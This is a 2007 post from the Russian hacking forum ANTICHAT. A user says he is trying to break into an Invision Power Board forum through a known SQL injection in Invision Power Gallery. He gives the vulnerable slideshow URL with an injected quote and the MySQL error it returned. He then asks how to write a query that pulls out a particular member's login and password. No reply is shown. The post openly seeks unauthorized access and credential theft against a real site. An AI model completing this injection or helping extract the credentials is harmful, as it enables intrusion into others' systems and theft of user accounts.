HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

invision gallery
  #1  
Старый 18.01.2007, 20:03
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
С нами: 10602901

Репутация: 11
По умолчанию invision gallery

Народ, нид хелп. Пытаюсь взломать ipb-шный форум. На нем стоит invision power gallery
Нашел на багтраке скуль уязвимость
Код:
/index.php?act=module&module=gallery&cmd=slideshow&show='
Выдает такую ошибку
Код:
mySQL query error: SELECT i.file_type, i.masked_file_name, i.caption, i.id, i.directory, m.name, m.id AS mid 
                FROM forum_gallery_images i, forum_members m 
                WHERE album_id=0 AND m.id=i.member_id 
                ORDER BY date DESC
                LIMIT ', 1

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 1' at line 5
mySQL error code: 
Date: Thursday 18th of January 2007 06:54:30 PM
И вот вопрос. Как составить запрос чтобы вывел логин и пароль определенного юзера.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Invision Gallery 2.0.7 ReadFile() & SQL injection exploit ~!DoK_tOR!~ Уязвимости CMS / форумов 1 04.01.2007 13:15
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 19 18.11.2006 09:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.